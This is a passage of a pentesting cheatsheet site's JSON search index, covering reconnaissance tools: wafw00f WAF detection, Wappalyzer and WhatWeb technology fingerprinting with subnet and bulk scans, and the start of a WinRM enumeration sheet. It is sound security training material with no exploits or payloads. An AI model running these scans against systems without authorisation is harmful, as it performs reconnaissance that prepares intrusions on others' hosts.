file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-f \u0026lt;format\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput format: \u003ccode\u003ecsv\u003c/code\u003e, \u003ccode\u003ejson\u003c/code\u003e, \u003ccode\u003etext\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-i \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRead targets from input file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-p \u0026lt;proxy\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse proxy (e.g. \u003ccode\u003ehttp://127.0.0.1:8080\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSet request timeout (seconds)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-H \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse custom headers from file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-l\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eList all WAFs it can detect\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--no-colors\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable ANSI colored output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"listing--targeted-detection\"\u003eListing \u0026amp; Targeted Detection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f -l \u003cspan style=\"color:#75715e\"\u003e# List supported WAFs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f example.com -t \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Cloudflare (Cloudflare Inc.)\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f example.com -a \u003cspan style=\"color:#75715e\"\u003e# Detect every WAF in chain\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"bulk-scanning\"\u003eBulk Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f -i targets.txt -o results.json -f json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f -i urls.txt -a -o waf-report.csv -f csv\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"routing-through-a-proxy-burp--zap\"\u003eRouting Through a Proxy (Burp / ZAP)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f https://target.tld -p http://127.0.0.1:8080\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"custom-headers-file-example\"\u003eCustom Headers File Example\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003eheaders.txt\u003c/code\u003e:\u003c/p\u003e","title":"wafw00f"},{"content":"Wappalyzer Cheatsheet Purpose: Identify web technologies — CMS, frameworks, JS libraries, analytics, ecommerce, CDNs — from response headers, HTML, cookies, scripts, and DOM.\nNote: Wappalyzer is primarily a browser extension and web service. The original CLI/NPM package was deprecated; community forks still exist.\nAccess Points Surface URL / Source Browser extension (Chrome / Firefox / Edge) https://www.wappalyzer.com/apps/ Web lookup (single URL) https://www.wappalyzer.com/lookup/ API / bulk lookups (paid) https://www.wappalyzer.com/api/ Legacy NPM CLI (deprecated, archived) npm i -g wappalyzer Community fork (Webappalyzer) https://github.com/enthec/webappanalyzer Browser Extension Workflow Install extension; pin to toolbar. Navigate to target. Click the icon — categories light up: CMS, Web frameworks, JS libs, Analytics, Web servers, Tag managers, CDN, Ecommerce, Payment processors, Font scripts, Issue trackers, etc. Click a detected tech for vendor links and version info (when available). Stealth value: all detection runs in your browser against an already-loaded page → no extra requests to the target.\nLegacy CLI (archived, may not install on modern Node) npm i -g wappalyzer wappalyzer https://target.tld # JSON to stdout wappalyzer https://target.tld --pretty # Indented JSON wappalyzer https://target.tld --recursive --depth=2 # Crawl wappalyzer https://target.tld --user-agent \u0026#34;Recon/1.0\u0026#34; wappalyzer https://target.tld --proxy http://127.0.0.1:8080 Useful flags (legacy):\nFlag Description --pretty Pretty-print JSON --recursive Crawl links on the same domain --depth=\u0026lt;n\u0026gt; Crawl depth --max-urls=\u0026lt;n\u0026gt; Cap URL count --user-agent \u0026lt;ua\u0026gt; Custom UA --proxy \u0026lt;url\u0026gt; Route through proxy --no-scripts Skip JS evaluation Web Lookup (no install) https://www.wappalyzer.com/lookup/\u0026lt;domain\u0026gt; Use when you can\u0026rsquo;t install the extension (locked workstation, throwaway VM). Result mirrors what the extension shows.\nData It Reveals CMS + version (WordPress, Drupal, Joomla, Ghost, …) Web servers (Nginx, Apache, IIS, LiteSpeed) Application servers / frameworks (Laravel, Django, Rails, ASP.NET, Express, Next.js) JS frameworks \u0026amp; UI libs (React, Vue, Angular, jQuery, Svelte) Tag managers / analytics (GTM, GA, Matomo, Hotjar) CDNs (Cloudflare, Akamai, Fastly, CloudFront) Ecommerce platforms (Shopify, Magento, WooCommerce) Payment processors, search platforms, A/B tools, CRMs Tips Extension uses page DOM + already-fetched assets → no extra noise on the target. Cross-check with whatweb -a 3 from a CLI host; Wappalyzer and WhatWeb miss different things. For bulk programmatic detection prefer WhatWeb (free, scriptable) or Wappalyzer\u0026rsquo;s paid API. Versions reported via JS globals / generator meta — confirm with curl -sI or by fetching a known asset path (/wp-includes/, /sites/default/files/). Useful for OSINT recon before engagement — runs entirely in your browser. Related [[whatweb]] — scriptable equivalent for CLI / pipelines. [[builtwith]] — historical tech profile for the domain. [[wafw00f]] — companion for WAF detection. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/wappalyzer/","summary":"\u003ch1 id=\"wappalyzer-cheatsheet\"\u003eWappalyzer Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Identify web technologies — CMS, frameworks, JS libraries, analytics, ecommerce, CDNs — from response headers, HTML, cookies, scripts, and DOM.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eNote:\u003c/strong\u003e Wappalyzer is primarily a \u003cstrong\u003ebrowser extension\u003c/strong\u003e and \u003cstrong\u003eweb service\u003c/strong\u003e. The original CLI/NPM package was deprecated; community forks still exist.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"access-points\"\u003eAccess Points\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eSurface\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eURL / Source\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eBrowser extension (Chrome / Firefox / Edge)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://www.wappalyzer.com/apps/\"\u003ehttps://www.wappalyzer.com/apps/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eWeb lookup (single URL)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://www.wappalyzer.com/lookup/\"\u003ehttps://www.wappalyzer.com/lookup/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eAPI / bulk lookups (paid)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://www.wappalyzer.com/api/\"\u003ehttps://www.wappalyzer.com/api/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eLegacy NPM CLI (deprecated, archived)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003enpm i -g wappalyzer\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCommunity fork (Webappalyzer)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://github.com/enthec/webappanalyzer\"\u003ehttps://github.com/enthec/webappanalyzer\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"browser-extension-workflow\"\u003eBrowser Extension Workflow\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInstall extension; pin to toolbar.\u003c/li\u003e\n\u003cli\u003eNavigate to target.\u003c/li\u003e\n\u003cli\u003eClick the icon — categories light up: \u003cstrong\u003eCMS\u003c/strong\u003e, \u003cstrong\u003eWeb frameworks\u003c/strong\u003e, \u003cstrong\u003eJS libs\u003c/strong\u003e, \u003cstrong\u003eAnalytics\u003c/strong\u003e, \u003cstrong\u003eWeb servers\u003c/strong\u003e, \u003cstrong\u003eTag managers\u003c/strong\u003e, \u003cstrong\u003eCDN\u003c/strong\u003e, \u003cstrong\u003eEcommerce\u003c/strong\u003e, \u003cstrong\u003ePayment processors\u003c/strong\u003e, \u003cstrong\u003eFont scripts\u003c/strong\u003e, \u003cstrong\u003eIssue trackers\u003c/strong\u003e, etc.\u003c/li\u003e\n\u003cli\u003eClick a detected tech for vendor links and version info (when available).\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003e\u003cstrong\u003eStealth value:\u003c/strong\u003e all detection runs in your browser against an already-loaded page → no extra requests to the target.\u003c/p\u003e","title":"wappalyzer"},{"content":"WhatWeb Cheatsheet Purpose: Identify web technologies — CMS, frameworks, web servers, JS libraries, analytics, version numbers — via signature plugins.\nBasic Usage whatweb \u0026lt;target\u0026gt; # Default scan whatweb https://target.tld whatweb -v https://target.tld # Verbose (full plugin output) whatweb -a 3 https://target.tld # Aggression level 3 whatweb target.tld --colour=never # No ANSI in output Common Flags Flag Description -v Verbose — full plugin details, not just summary -a \u0026lt;0-4\u0026gt; Aggression level (see below) -i \u0026lt;file\u0026gt; Read targets from file --input-file \u0026lt;file\u0026gt; Same as -i -U \u0026lt;ua\u0026gt; Custom User-Agent --header \u0026quot;K: V\u0026quot; Add custom header (repeatable) -c \u0026quot;\u0026lt;cookie\u0026gt;\u0026quot; Set Cookie header --user \u0026quot;\u0026lt;u:p\u0026gt;\u0026quot; HTTP Basic auth --proxy \u0026lt;host:port\u0026gt; Use proxy --proxy-user \u0026lt;u:p\u0026gt; Proxy auth --follow-redirect \u0026lt;mode\u0026gt; never, http-only, meta-only, same-site, always -t \u0026lt;n\u0026gt; Threads (default 25) --open-timeout \u0026lt;s\u0026gt; Connect timeout --read-timeout \u0026lt;s\u0026gt; Read timeout --log-brief \u0026lt;file\u0026gt; One-line summary log --log-verbose \u0026lt;file\u0026gt; Verbose log --log-xml \u0026lt;file\u0026gt; XML output --log-json \u0026lt;file\u0026gt; JSON output --log-magictree \u0026lt;file\u0026gt; MagicTree XML --log-sql \u0026lt;file\u0026gt; SQL insert statements -l List plugins -I \u0026lt;plugin\u0026gt; Show plugin info --plugins \u0026lt;list\u0026gt; Only run listed plugins (comma-separated) --no-errors Suppress connection errors Aggression Levels (-a) Level Name Behavior 1 Stealthy One GET per target, never follows redirects beyond that 2 (unused) Reserved 3 Aggressive Triggers extra requests when plugins want them (e.g. /wp-login.php) 4 Heavy Many requests per plugin; noisy, may set off WAF/IDS whatweb -a 1 target.tld # Single request, low noise whatweb -a 3 target.tld # Recommended for thorough enum whatweb -a 4 -v target.tld # Full noise, full detail Bulk / List Scanning whatweb -i targets.txt --log-brief whatweb.txt whatweb -i urls.txt -a 3 --log-json whatweb.json --no-errors cat ips.txt | whatweb --log-verbose verbose.log CIDR / range scan:\nwhatweb 192.168.1.0/24 --log-brief subnet.txt whatweb 192.168.1.1-50 -a 1 Routing Through Burp / ZAP whatweb --proxy 127.0.0.1:8080 https://target.tld whatweb --proxy 127.0.0.1:8080 --proxy-user user:pass target.tld Plugin Inspection whatweb -l # List all plugins whatweb -l | grep -i wordpress # Find a plugin whatweb -I WordPress # Show what a plugin checks for whatweb --plugins WordPress,Apache https://target.tld whatweb --plugins +/path/to/custom.rb target.tld # Add custom plugin Output Formats # Brief one-liners (good for diffing scans) whatweb -i list.txt --log-brief brief.txt # Verbose, human-readable whatweb -a 3 -v target.tld --log-verbose detailed.log # Machine-readable whatweb -i list.txt --log-json result.json whatweb -i list.txt --log-xml result.xml Practical Recipes # Stack fingerprint of a single target whatweb -a 3 -v https://target.tld # Survey an internal subnet, no errors clutter whatweb 10.67.10.0/24 -a 1 --no-errors --log-brief lab-stack.txt # Quiet recon through Burp for later replay whatweb --proxy 127.0.0.1:8080 -a 1 target.tld # Pair with wafw00f for stack + WAF in one pass wafw00f https://target.tld \u0026amp;\u0026amp; whatweb -a 3 -v https://target.tld Tips Default aggression is 1 — bump to 3 for real enumeration. WhatWeb reports plugin matches with confidence; treat low-confidence hits as leads, not facts. Combine with curl -sIL to confirm headers WhatWeb reported. For CMS-specific deep dives, switch to dedicated tools after WhatWeb (wpscan, droopescan, joomscan). Output to JSON if you need to diff stacks across hosts or over time. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/whatweb/","summary":"\u003ch1 id=\"whatweb-cheatsheet\"\u003eWhatWeb Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Identify web technologies — CMS, frameworks, web servers, JS libraries, analytics, version numbers — via signature plugins.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Default scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb https://target.tld\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -v https://target.tld \u003cspan style=\"color:#75715e\"\u003e# Verbose (full plugin output)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -a \u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e https://target.tld \u003cspan style=\"color:#75715e\"\u003e# Aggression level 3\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb target.tld --colour\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003enever \u003cspan style=\"color:#75715e\"\u003e# No ANSI in output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose — full plugin details, not just summary\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-a \u0026lt;0-4\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAggression level (see below)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-i \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRead targets from file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--input-file \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSame as \u003ccode\u003e-i\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-U \u0026lt;ua\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom User-Agent\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--header \u0026quot;K: V\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAdd custom header (repeatable)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-c \u0026quot;\u0026lt;cookie\u0026gt;\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSet Cookie header\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--user \u0026quot;\u0026lt;u:p\u0026gt;\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP Basic auth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--proxy \u0026lt;host:port\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse proxy\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--proxy-user \u0026lt;u:p\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eProxy auth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--follow-redirect \u0026lt;mode\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003enever\u003c/code\u003e, \u003ccode\u003ehttp-only\u003c/code\u003e, \u003ccode\u003emeta-only\u003c/code\u003e, \u003ccode\u003esame-site\u003c/code\u003e, \u003ccode\u003ealways\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eThreads (default 25)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--open-timeout \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eConnect timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--read-timeout \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRead timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-brief \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOne-line summary log\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-verbose \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose log\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-xml \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eXML output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-json \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eJSON output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-magictree \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMagicTree XML\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-sql \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSQL insert statements\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-l\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eList plugins\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-I \u0026lt;plugin\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow plugin info\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--plugins \u0026lt;list\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOnly run listed plugins (comma-separated)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--no-errors\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSuppress connection errors\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"aggression-levels--a\"\u003eAggression Levels (\u003ccode\u003e-a\u003c/code\u003e)\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eLevel\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eName\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eBehavior\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e1\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eStealthy\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOne GET per target, never follows redirects beyond that\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e2\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e(unused)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eReserved\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e3\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAggressive\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTriggers extra requests when plugins want them (e.g. \u003ccode\u003e/wp-login.php\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e4\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHeavy\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMany requests per plugin; noisy, may set off WAF/IDS\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -a \u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e target.tld \u003cspan style=\"color:#75715e\"\u003e# Single request, low noise\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -a \u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e target.tld \u003cspan style=\"color:#75715e\"\u003e# Recommended for thorough enum\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -a \u003cspan style=\"color:#ae81ff\"\u003e4\u003c/span\u003e -v target.tld \u003cspan style=\"color:#75715e\"\u003e# Full noise, full detail\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"bulk--list-scanning\"\u003eBulk / List Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -i targets.txt --log-brief whatweb.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -i urls.txt -a \u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e --log-json whatweb.json --no-errors\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecat ips.txt | whatweb --log-verbose verbose.log\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eCIDR / range scan:\u003c/p\u003e","title":"whatweb"},{"content":"WinRM Enumeration Cheatsheet Default Ports: 5985 (HTTP / WS-Management), 5986 (HTTPS)\nWhat is WinRM? Windows Remote Management — Microsoft\u0026rsquo;s implementation of WS-Management. Used for remote PowerShell, remote command execution, and administration.\nDetection nmap -p 5985,5986 